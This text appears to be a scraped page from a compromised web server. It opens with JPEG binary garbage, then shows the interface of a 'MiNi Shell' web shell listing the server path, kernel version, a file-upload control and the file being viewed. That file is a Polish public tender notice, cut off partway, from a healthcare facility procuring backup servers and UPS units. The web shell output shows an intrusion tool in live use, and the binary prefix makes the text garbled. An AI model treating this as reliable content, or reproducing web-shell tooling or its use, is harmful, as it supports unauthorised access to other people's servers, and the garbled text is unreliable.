JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250328/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250328/0016818701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa serwera backupowego wraz z oprogr. oraz serwera<br/>do arch. bazy danych (...) wraz z dwoma zasilaczami awaryjnymi UPS w ramach projektu pod nazwą Wsparcie podstawowej<br/>opieki zdrowotnej (POZ). </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Zakład Opieki Zdrowotnej w Ogrodzieńcu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276985281</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Plac Wolności 23</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ogrodzieniec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-440</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">Kadry@spzoz.ogrodzieniec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.spzoz.ogrodzieniec.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Samodzielny Publiczny Zakład Opieki Zdrowotnej </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa serwera backupowego wraz z oprogr. oraz serwera<br/>do arch. bazy danych (...) wraz z dwoma zasilaczami awaryjnymi UPS w ramach projektu pod nazwą Wsparcie podstawowej<br/>opieki zdrowotnej (POZ). </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-57ca0312-47dd-4683-8d02-fabbf70043b1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00168187</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamówienie realizowane w ramach Projektu grantowego nr FENX.06.01-IP.03-0001/23 pod nazwą „Wsparcie podstawowej opieki zdrowotnej (POZ)”, realizowanego w ramach programu Fundusze Europejskie na Infrastrukturę, Klimat, Środowisko 2021-2027, współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-57ca0312-47dd-4683-8d02-fabbf70043b1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami może się odbywać wyłącznie<br/>przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną<br/>(Dz. U. z 2024 r. poz. 1513), tj.: przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>tj.: za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji).<br/>2. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>Kadry@spzoz.ogrodzieniec.pl (nie dotyczy składania ofert) oraz adresy e-mail Wykonawców podane w formularzach ofertowych.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która<br/>jest dostępna pod adresem https://ezamowienia.gov.pl<br/>2. Komunikacja między Zamawiającym a Wykonawcami może się odbywać wyłącznie przy użyciu środków komunikacji<br/>elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2024 r. poz. 1513), tj.:<br/>przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl. tj.:za pośrednictwem formularzy<br/>do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji).<br/>3. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komu. za pomocą poczty elektronicznej na adres e-mail:<br/>Kadry@spzoz.ogrodzieniec.pl<br/>(nie dotyczy składania ofert) oraz adresy e-mail Wykonawców podane w form.ofertowych.<br/>4. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji”<br/>odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odp.. Formularze do komunikacji<br/>umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>5. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji”<br/>służących do zadawania pytań dot. treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na<br/>Platformie e-Zamówienia.<br/>6. Wszystkie wysłane i odebrane w post. przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w<br/>zakładce „Komunikacja”.<br/>7. Maks. rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików<br/>przesyłanych jako zał. do jednego formularza).<br/>8. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia okr .Regulamin Platformy e-Zamówienia.<br/>Ze wzgl. na ogr. ilość znaków szczegóły w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>	administratorem Pani/Pana danych osobowych jest: Dyrektor Samodzielnego Zakładu Opieki Zdrowotnej w Ogrodzieńcu;<br/>	administrator wyznaczył Inspektora Ochrony Danych – Pana Michała Malickiego, z którym może się Pani/Pan skontaktować w sprawach związanych z ochroną danych osobowych w następujący sposób: e-mail: anmal.malicki@gmail.com ;<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego: <br/>	Dostawa serwera backupowego wraz z oprogramowaniem serwerowym i backupowym oraz serwera do archiwizacji bazy danych oprogramowania do obsługi poradni, archiwizacji dokumentacji medycznej, skanów dokumentów dołączanych do dokumentacji wraz z dwoma UPS-ami realizowane w ramach projektu pod nazwą „Wsparcie podstawowej opieki zdrowotnej (POZ)” odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz.U. z 2024 r. poz. 1320) dalej „ustawa Pzp”;<br/>	Pani/Pana dane osobowe będą przechowywane przez okres, który wyznaczony zostanie przede wszystkim na podstawie rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie działania archiwów zakładowych, chyba że przepisy szczególne stanowią inaczej;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>•	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>•	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych(1);<br/>•	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych (2);<br/>•	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>•	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>•	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/><br/>(1) wyjaśnienie: skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowaniao udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/><br/>(2) wyjaśnienie: zgodnie z art. 19 ust. 3 ustawy Pzp wystąpienie z zadaniem o którym mowa w art. 18 ust.1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postepowania o udzielenie zamówienia publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/2/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: Dostawa serwera backupowego wraz z oprogramowaniem serwerowym i backupowym<br/>oraz serwera do archiwizacji bazy danych oprogramowania do obsługi poradni, archiwizacji dokumentacji medycznej,<br/>skanów dokumentów dołączanych do dokumentacji wraz z zasilaczami awaryjnymi UPS realizowane w ramach projektu pod<br/>nazwą „Wsparcie podstawowej opieki zdrowotnej (POZ)”.<br/>2. Szczegółowy opis przedmiotu zamówienia (OPZ) stanowi Załącznik nr 4 do SWZ.<br/>3. Ponadto, obowiązki Wykonawcy związane z realizacją zamówienia określają także załączone do SWZ projektowane<br/>postanowienia umowy – PPU.<br/>4. Zamówienie realizowane w ramach Projektu grantowego nr FENX.06.01-IP.03-0001/23 pod nazwą „Wsparcie<br/>podstawowej opieki zdrowotnej (POZ)”, realizowanego w ramach programu Fundusze Europejskie na Infrastrukturę, Klimat,<br/>Środowisko 2021-2027, współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego.<br/>5. Przedmiot zamówienia będzie dostępny dla osób niepełnosprawnych.<br/>Przedmiot zamówienia będzie dostępny dla osób niepełnosprawnych: Wygląd systemu przystosowany dla osób niepełnosprawnych np.: słabowidzących.<br/>OPZ:<br/>1.	Serwer backupowy wraz z oprogramowaniem serwerowym i backupowym – 1 szt., Serwer do archiwizacji bazy danych oprogramowania do obsługi poradni, archiwizacji dokumentacji medycznej, skanów dokumentów dołączanych do dokumentacji – 1 szt: w konfiguracji nie gorszej niż:<br/>Charakterystyka / wymagania minimalne:<br/>1. Typ	Serwer typu RACK<br/>2. Procesor	Jeden procesor minimum 8 rdzeniowy, dedykowany do pracy z zaoferowanym serwerem, osiągający w testach SPECrate2017_int_base wynik nie gorszy niż 80 punktów w teście dostępnym na stronie internetowej www.spec.org z dnia 28.03.2025 r. (wyniki załączone do dokumentów postępowania).<br/>3. Płyta główna:	Płyta główna dedykowana do pracy w serwerach, umożliwiająca instalację zaoferowanego procesora.<br/>Kontroler pamięci RAID - Zainstalowany kontroler 12 Gb/s SAS/SATA z obsługą RAID 0, 1, 10, 5.<br/>4. Pamięć operacyjyna RAM:	Pamięć operacyjna RAM - Min. 32GB pamięci ECC z możliwością rozbudowy do 128GB pamięci.<br/>Min. 4 banki pamięci w tym min. 3 banki wolne<br/>5. Parametry pamięci masowej	Zainstalowane dwa dyski 960GB skonfigurowane w RAID 1. <br/>Typ dysków SSD SATA Interfejs SATA III Rozmiar dysku: 2.5”<br/>Dyski z przeznaczeniem serwerowym (klasa enterprise)<br/>6. Karta graficzna	Zintegrowana z płytą główną, posiadająca minimum 16MB pamięci, umożliwiająca poprawne wyświetlenie obrazu w rozdzielczości co najmniej 1920x1200..<br/>7. Porty / złącza zewnętrzne	Min.: 1 x USB 2.0 (1 z przodu), 1 x USB 3.2 Gen 1 (1 z przodu), <br/>2 x USB 3.2 Gen 2, 1 x szeregowe, 1 x VGA, 1 x zarządzanie - RJ-45, 2 x LAN (Gigabit Ethernet) - RJ-45<br/>8. Sloty rozszerzeń	Min. 1 (całkowity) / 1 (wolna) x PCIe 4.0 x8, Min. 1 (całkowity) / 1 (wolna) x PCIe 4.0 x8, Min. 1 (całkowity) / 1 (wolna) x PCIe 3.0 x4 (do kontrolera pamięci wewnętrznej)<br/>Min. 2 (całkowity) / 2 (wolna) x M.2 Card<br/>9. Obudowa	Do instalacji w szafie rack 19&#34;, wysokość nie więcej niż 1U, z zestawem szyn do mocowania w szafie i wysuwania. Głębokość/długość serwera nie większa niż 600mm.<br/>Zainstalowana klatka na minimum 8 dysków Hot Plug 2,5&#39;&#39;. Możliwość instalacji dysków SATA, SAS, SSD.<br/>Możliwość instalacji dedykowanej, wewnętrznej pamięci flash przeznaczonej dla wirtualizatora w slocie M.2 bez zajmowania klatek dyskowych serwera.<br/>10. Zasilacz	Zasilacz o mocy minimum 800W i posiadający certyfikat co najmniej 80 Plus Platinum lub równoważny.<br/>Możliwość montażu dodatkowego zasilacza i pracy urządzenia z 2 zasilaczami (Zasilacz nadmiarowy z funkcją hot-swap).<br/>11. Zgodność <br/>z systemami operacyjnymi	Microsoft Windows Server 2022, 2025; Red Hat Enterprise Linux 8,9 (x64); SUSE Linux Enterprise Server 15 ; VMware vSphere (ESXi) 7.0 I 8.0.<br/>12. Bezpieczeństwo	Moduł TPM 2.0 trwale zintegrowany / wbudowany w płytę główną. Nie dopuszcza się modułów wpinanych w płytę główną lub wbudowany w procesorze.<br/>13. Diagnostyka	Serwer powinien posiadać system przedwczesnego wykrywania awarii co najmniej dla następujących komponentów: pamięci, dyski, kontrolery RAID.<br/>Hasło włączania, hasło administratora, dwa moduły TPM (Trusted Platform Modules)<br/>14. Certyfikaty	Certyfikaty, oświadczenia i standardy - Deklaracja zgodności CE <br/>Certyfikat ISO 9001 dla producenta serwera lub równoważny<br/>Certyfikat ISO 14001 dla producenta serwera lub równoważny<br/>Certyfikat ISO 27001 dla producenta serwera lub równoważny<br/>Certyfikat ISO 50001 dla producenta serwera lub równoważny<br/>Certyfikat EPEAT w standardzie Bronze lub równoważny<br/>15. System operacyjny	Microsoft Windows Server Standard 2022 lub równoważny.<br/>Za równoważny Zamawiający przyjmuje:<br/>System należy dostarczyć wraz z licencjami CAL na 25 użytkowników.<br/>*Równoważne rozwiązanie musi spełniać następujące wymagania poprzez wbudowane mechanizmy, bez użycia dodatkowych aplikacji:<br/>1.	System operacyjny musi być przeznaczony do zastosowań serwerowych w Środowiskach fizycznych lub o minimalnej wirtualizacji. <br/>2.	System operacyjny musi być najnowszą wersją rodziny systemów operacyjnych danego producenta. <br/>3.	Licencja na system operacyjny musi uwzględniać prawo do bezpłatnej instalacji udostępnianych przez producenta poprawek krytycznych i opcjonalnych do zakupionej wersji oprogramowania co najmniej przez 5 lat. <br/>4.	Licencja na system operacyjny musi umożliwiać uruchomienie kontrolera domeny Active Directory na poziomie Microsoft Windows Server <br/>5.	Licencja na system operacyjny musi być bez ograniczeń czasowych. <br/>6.	Licencja na system operacyjny musi pokrywać wszystkie fizyczne rdzenie na serwerze. <br/>7.	Licencja na system operacyjny musi uprawniać do uruchamiania systemu operacyjnego w środowisku fizycznym i min. 2 środowiskach wirtualnych za pomocą wbudowanych mechanizmów wirtualizacji, bez konieczności zakupu dodatkowych licencji. <br/>8.	Zaimplementowanie w systemie operacyjnym środowiska wirtualizacyjnego musi umożliwiać dodawanie i usuwanie pamięci wirtualnej oraz wirtualnych kart sieciowych podczas pracy maszyny wirtualnej. <br/>9.	System operacyjny musi posiadać graficzny interfejs użytkownika. <br/>10. System operacyjny musi być w pełni kompatybilny z usługą Active Directory w zakresie: <br/>a.	zarządzania użytkownikami, <br/>b.	zarządzania certyfikatami dla użytkowników wraz ze wsparciem możliwości logowania do domeny kartą mikroprocesorową, <br/>c.	możliwości przydzielania praw dostępu do zasobów sieciowych, <br/>d.	instalacji zdalnej oprogramowania z pakietów msi, <br/>e.	definiowanie polityk bezpieczeństwa dla użytkowników, grup oraz stacji roboczych z systemami MS Windows: 7,8,8.1, 10,11. <br/>11. System operacyjny musi wspierać pracę domenową wraz z automatyczną synchronizacją dla dodatkowych serwerów. <br/>12. System operacyjny musi wspierać zarządzanie przez dostępne narzędzia administracji serwera dla systemu Windows 10 (RSAT) oraz Windows Admin Center . <br/>13. System operacyjny musi posiadać obsługę zdalnego pulpitu poprzez protokół RDP. <br/>14. System operacyjny musi umożliwiać ustawianie relacji zaufania pomiędzy domenami. <br/>15. Wszystkie narzędzia i usługi systemu operacyjnego powinny być rozwiązaniem jednego producenta. <br/>16. System operacyjny musi posiadać obsługę pamięci USB jako monitora klastra. System operacyjny musi pozwalać na stopniowe uaktualnienia systemu operacyjnego klastra <br/>17. System operacyjny musi posiadać obsługę deduplikacji na potrzeby systemu plików ReFS. <br/>18. System operacyjny musi posiadać obsługę optymalizacji transportu w tle pod kątem opóźnień. <br/>19. System operacyjny musi posiadać wbudowaną zaporę internetową (firewall) dla ochrony połączeń internetowych; zapora musi być zintegrowana z systemem konsoli do zarządzania ustawieniami zapory i regułami ip v4 i v6; <br/>20. System operacyjny musi posiadać możliwość uruchomienia serwera DNS z możliwością integracji z kontrolerem domeny; <br/>21. System operacyjny musi posiadać możliwość zdalnej automatycznej instalacji, konfiguracji, administrowania oraz aktualizowania systemu; <br/>22. System operacyjny musi posiadać obsługa PowerShelI 5.1, <br/>23. System operacyjny musi posiadać obsługę certyfikatów w Active Directory <br/>24. Wszystkie wymienione powyżej parametry, role, funkcje, itp. systemu operacyjnego objęte muszą być dostarczoną licencją (licencjami) i zawarte w dostarczonej wersji oprogramowania (nie wymagają ponoszenia przez Zamawiającego dodatkowych kosztów).<br/>16. Zarządzanie zdalne	Zintegrowany z płytą główną serwera, niezależny od systemu operacyjnego, sprzętowy kontroler zdalnego zarządzania zgodny ze standardem IPMI 2.0, SNMP i CIM umożliwiający:<br/>zdalny restart serwera i zarządzanie serwerem poprzez połączenie w sieci TCP/IP przy użyciu przeglądarki internetowej, jednoczesny dostęp do konsoli przez minimum sześciu użytkowników, włączanie/wyłączanie serwera, autentykację użytkowników przy pomocy bezpiecznego połączenia z serwerem LDAP (Lightwieght Directory Access Protocol), monitoring oraz zarządanie mocą i jej zużyciem.<br/>Kontroler zdalnego zarządzania wspierający DNS (Domain Name System) oraz DHCP (Dynamic Host Configuration Protocol)<br/>Dodatkowo kontroler musi umożliwiać przejęcie zdalnej konsoli graficznej i mapowania lokalnych napędów dyskowych do serwera.<br/>17. Chłodzenie	Dostępne minimum 4 wentylatory wbudowane w urządzenie.<br/>18. Dodatkowe funkcjonalności	Dostępność konsoli monitorującej na urządzeniach przenośnych ze wsparciem dla systemu Android oraz iOS. Opcjonalny zamykany panel przedni serwera.<br/>Możliwość pracy w temperaturze do 35 stopni 